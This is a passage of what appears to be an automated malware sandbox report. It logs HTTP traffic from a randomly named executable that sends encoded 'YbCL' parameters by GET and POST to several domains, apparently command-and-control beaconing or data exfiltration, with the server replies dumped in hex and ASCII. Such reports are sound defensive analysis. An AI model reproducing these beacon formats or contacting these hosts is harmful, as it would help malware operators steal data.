                                          Data Ascii: YbCL=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIHoW3wu7AeBT9hRHxBbWZ+xupcf6/SGnGcpmji6kYj7kEMIa5HHvshQ5+/PTut4QK0qZ597/XbOi1cWRKFgWSADA+kDImsvlV6nBllPheO73yM6PmUTD4GY2WiBlbfKxdC4WfwAAAk0aSmeQ/EoDWsJCbC83DgR88HkXxLiF2L67HNff1YAVeTzqECjbplJhCZnI++rYm8w5RH1cO08cw4kzbM7Qr/sJ6krN0HJPhWpZC+p74StObYPD5HYu29ASGftp9DJNdrEC5SU8ca1XzCVM64KPI5XXITbt0adutcL679ckeRtG8MqNkMJ51B+GnO4W1VmiKT/QsttfoHNSTFnXp6qREOT4Nh3Dfd2UQnn5uD/JzSzqoKfzOHcWjKkrgxbHCJS3g5pmEWjVeaTP3Yrz4v5YWh1u6JnSqC19+iaQoxZYvcffsyOKpyh/Y2njIWlSaVsVNut+D2iyvg0+xmRZBh5Q3nPL6k0HBnuf9txSzacOrGha/6N2DrKaaksV91EUgwyG1OXATvgbEreWKfDNQd0bjFzKfyJ71+wCx5EVLeQ3kcEGjV7DNF7eDIMK9Sek9VbL+18fnnfGe9RQr9d+iT504CHod08ipRLT1DV1cW0ZKJIf+j1pNtLiQlPBhiTEYWh6SVObq0MpiuQ9LkROmGC5z8qQDqTpMM0nQmkLyzSp+hwqfje6fs3JbL+B691XxVMl8dOKk0tiZKbcj/j/MOuMYy7S9aMIn76Sja2gdvTuPgf3tRIDT0b+T3r1Hc/M5DbOU/MYsSb0UK0KxtgP371G2WCODPF4is/1vEK/0ly3wAZ+V3PaFUrjAdL9XlnzWBt6UumoegjJXZ7pzBBEx1zhI0TAQYbhLGwmZyQQaz1Ie53YNhDhHqL7KGAiWKSNd9PFDCTvGUzbPjb5arqEWxDAmU9bkr0AIOsrUE4jB1rFwVwkM6e1hVJatOVkpinloFV [TRUNCATED]
                                          Jul 4, 2024 16:53:50.636241913 CEST367INHTTP/1.1 404 Not Found
                                          Date: Thu, 04 Jul 2024 14:59:32 GMT
                                          Server: Apache
                                          Content-Length: 203
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          12192.168.2.74971943.252.167.188806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:53:51.995414972 CEST534OUTGET /rm91/?fhW=BLvXr6e0EhyxeX&YbCL=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WH8ALvnjmtlYhpciewdwpfxiI173pYZLp0P/Ncxt8Rkrw2XK7hs/fa/r1 HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.xn--fhq1c541j0zr.com
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Jul 4, 2024 16:53:52.998866081 CEST367INHTTP/1.1 404 Not Found
                                          Date: Thu, 04 Jul 2024 14:59:35 GMT
                                          Server: Apache
                                          Content-Length: 203
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          13192.168.2.749720194.9.94.85806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:53:58.144607067 CEST808OUTPOST /4hda/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.xn--matfrmn-jxa4m.se
                                          Origin: http://www.xn--matfrmn-jxa4m.se
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 217
                                          Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 2f 48 67 49 57 6e 6b 32 43 46 4a 44 59 5a 35 53 2f 5a 30 73 55 33 36 56 4d 78 2b 44 6f 58 76 74 6f 4b 53 57 66 47 4d 6a 79 6b 4d 46 70 30 42 75 67 46 72 74 58 59 6a 77 57 54 4f 56 51 4d 2b 6d 44 32 51 74 6d 4a 76 42 77 63 6e 57 38 42 4a 58 73 7a 71 4b 35 33 51 76 42 74 6d 62 32 64 6d 72 6b 44 69 43 33 2b 66 56 52 76 66 4a 70 41 6a 33 54 7a 55 43 57 5a 74 44 53 52 59 38 45 6f 66 4b 6b 67 77 43 4c 71 33 67 64 35 50 6d 59 43 36 79 41 6f 45 32 58 4d 36 48 66 63 59 2f 46 73 79 2b 50 36 78 73 6d 4c 30 6a 68 78 32 50 75 6a 4b 51 6f 43 6b 4b 45 45 34 6a 4e 78 4a 6f 4e 48 64 30 32 4a 48 44 31 41 3d 3d
                                          Data Ascii: YbCL=zHwxZv4P/D2M/HgIWnk2CFJDYZ5S/Z0sU36VMx+DoXvtoKSWfGMjykMFp0BugFrtXYjwWTOVQM+mD2QtmJvBwcnW8BJXszqK53QvBtmb2dmrkDiC3+fVRvfJpAj3TzUCWZtDSRY8EofKkgwCLq3gd5PmYC6yAoE2XM6HfcY/Fsy+P6xsmL0jhx2PujKQoCkKEE4jNxJoNHd02JHD1A==
                                          Jul 4, 2024 16:53:58.815129995 CEST1236INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Thu, 04 Jul 2024 14:53:58 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          X-Powered-By: PHP/8.1.24
                                          Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                          Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                          Jul 4, 2024 16:53:58.815161943 CEST224INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                          Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
                                          Jul 4, 2024 16:53:58.815172911 CEST1236INData Raw: 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65
                                          Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
                                          Jul 4, 2024 16:53:58.815186024 CEST1236INData Raw: 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61
                                          Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
                                          Jul 4, 2024 16:53:58.815197945 CEST448INData Raw: 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 69 61 20 43 75 73 74 6f 6d 65 72 20
                                          Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
                                          Jul 4, 2024 16:53:58.815210104 CEST1236INData Raw: 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20 6f 6e 6c 69 6e 65 20 73 74 6f 72 65 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 3c 75 6c 3e 0a 09 09 09
                                          Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
                                          Jul 4, 2024 16:53:58.815334082 CEST206INData Raw: 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70
                                          Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          14192.168.2.749721194.9.94.85806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:54:00.682084084 CEST828OUTPOST /4hda/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.xn--matfrmn-jxa4m.se
                                          Origin: http://www.xn--matfrmn-jxa4m.se
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 237
                                          Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 37 74 76 75 57 57 65 48 4d 6a 78 6b 4d 46 37 55 41 6c 75 6c 72 36 58 59 2f 34 57 53 79 56 51 4d 36 6d 44 79 55 74 6d 2b 44 43 78 4d 6e 55 30 68 4a 52 6f 7a 71 4b 35 33 51 76 42 74 44 32 32 64 2b 72 6e 7a 53 43 32 63 33 4b 62 50 65 37 75 41 6a 33 45 6a 56 46 57 5a 73 7a 53 55 34 57 45 71 33 4b 6b 6b 30 43 4c 59 50 6a 4f 5a 4f 74 58 69 36 6e 50 49 45 35 51 50 4b 4a 52 72 6f 2f 4e 74 6d 6c 48 73 73 4f 38 70 34 50 2f 67 4f 30 71 68 75 6d 2f 6b 35 2f 47 46 38 37 41 54 39 4a 53 77 34 65 37 62 6d 48 6a 36 51 74 71 78 32 59 57 31 76 63 77 71 39 6f 44 61 6b 38 55 50 38 3d
                                          Data Ascii: YbCL=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boF7tvuWWeHMjxkMF7UAlulr6XY/4WSyVQM6mDyUtm+DCxMnU0hJRozqK53QvBtD22d+rnzSC2c3KbPe7uAj3EjVFWZszSU4WEq3Kkk0CLYPjOZOtXi6nPIE5QPKJRro/NtmlHssO8p4P/gO0qhum/k5/GF87AT9JSw4e7bmHj6Qtqx2YW1vcwq9oDak8UP8=
                                          Jul 4, 2024 16:54:01.344336987 CEST1236INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Thu, 04 Jul 2024 14:54:01 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          X-Powered-By: PHP/8.1.24
                                          Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                          Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                          Jul 4, 2024 16:54:01.344357014 CEST224INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                          Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
                                          Jul 4, 2024 16:54:01.344368935 CEST1236INData Raw: 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65
                                          Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
                                          Jul 4, 2024 16:54:01.344461918 CEST1236INData Raw: 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61
                                          Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
                                          Jul 4, 2024 16:54:01.344474077 CEST1236INData Raw: 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 69 61 20 43 75 73 74 6f 6d 65 72 20
                                          Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
                                          Jul 4, 2024 16:54:01.344489098 CEST654INData Raw: 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72 20 77 65 62 20 68 6f 73 74 69 6e 67
                                          Data Ascii: m_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loopia.se?utm_me


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          15192.168.2.749722194.9.94.85806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:54:03.217961073 CEST1841OUTPOST /4hda/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.xn--matfrmn-jxa4m.se
                                          Origin: http://www.xn--matfrmn-jxa4m.se
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 1249
                                          Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 6a 74 76 62 43 57 66 6b 30 6a 77 6b 4d 46 67 55 42 69 75 6c 71 34 58 59 33 38 57 53 2b 76 51 4f 53 6d 43 58 41 74 6b 4c 33 43 6f 38 6e 55 32 68 4a 51 73 7a 72 65 35 33 41 72 42 74 7a 32 32 64 2b 72 6e 78 4b 43 67 2b 66 4b 55 76 66 4a 70 41 6a 7a 54 7a 55 69 57 5a 31 4c 53 55 38 73 45 61 58 4b 6b 41 51 43 59 4c 33 6a 4e 35 4f 76 51 69 37 69 50 49 4a 35 51 4f 6e 6c 52 75 55 56 4e 76 47 6c 57 35 49 52 6a 4b 55 4f 74 67 47 4b 70 68 32 57 33 57 56 58 66 30 78 4d 44 7a 6b 6e 64 7a 49 46 79 72 65 6f 72 4e 4e 62 36 43 50 6d 56 47 33 2f 67 39 35 74 5a 36 67 45 4f 59 45 77 42 41 64 6d 7a 78 42 78 67 42 2b 79 2f 55 51 6e 73 2f 63 77 4f 67 75 50 70 58 4a 32 45 52 42 78 61 71 6a 31 65 36 47 45 67 46 46 41 32 51 54 4d 32 35 4b 37 39 55 7a 77 74 4a 49 58 58 51 79 46 65 6d 65 52 6c 4e 46 67 6f 33 64 6e 31 55 6c 6a 30 43 32 6b 38 6f 4b 54 5a 32 4a 70 6e 75 67 58 6b 51 49 77 2b [TRUNCATED]
                                          Data Ascii: YbCL=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boFjtvbCWfk0jwkMFgUBiulq4XY38WS+vQOSmCXAtkL3Co8nU2hJQszre53ArBtz22d+rnxKCg+fKUvfJpAjzTzUiWZ1LSU8sEaXKkAQCYL3jN5OvQi7iPIJ5QOnlRuUVNvGlW5IRjKUOtgGKph2W3WVXf0xMDzkndzIFyreorNNb6CPmVG3/g95tZ6gEOYEwBAdmzxBxgB+y/UQns/cwOguPpXJ2ERBxaqj1e6GEgFFA2QTM25K79UzwtJIXXQyFemeRlNFgo3dn1Ulj0C2k8oKTZ2JpnugXkQIw+UcWkSqggKaSzOp/KNFfQMsrNAJXV4YZrrxFePPINFPpP2ZR7X1SQ+8jwyUGRvrriVKdYzXldKKz/4DMPMmoI492bOWrrzkNZBc/IlLWPH73cJluVnoMLFnmJexhRdIa/pffmcmUKe1UFxM0t+P4t3QRSUDlYtlWcIQysaQeZNTBbuF7sOqfDQjd0XpAdkSJjvWw1s87/BqZ4UXKo4WF3v3JXEVtVueO2PMYxdd8qzHzP+2D88z6QQmdHwHgo++CZv0aCI2OAIVRzAWkeuV1AtoYyMbo2NgpGavFrLL0hwLYqgjFLz28y7IMP349zbkPoNIkxPUuRAxOFztflqeap9Y3XW3ZcJN0cWl21x57h98XQNWEe1moqZNEOXv/yxhUCw8nQeUDTb/a1699QlmjsZEoYSKXNfa0QKe4zqLdLNeMsTRIumDvQ9TnilxDrP+F5cr/zB8fJ4onaZaWuvkMX0tCpqMNCHMdySemAwjfwXHe3bDuCufe35qonNto/4d4trITbQlFe0lCXLk6PHcXKbC2Whvu/L/P+/JQfiWn/iFWwRGW0yZB8pQ1SEsMF6l4A6gMYo6CegFWGjQH6uG4pYAaXi0XH3Ggu5d0kx8a2z2x48RsB1QxvBU+ltq2+9yXX8W0c2XhNFR1pISijdkCNwMR7xtv0avr5r/ [TRUNCATED]
                                          Jul 4, 2024 16:54:03.888307095 CEST1236INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Thu, 04 Jul 2024 14:54:03 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          X-Powered-By: PHP/8.1.24
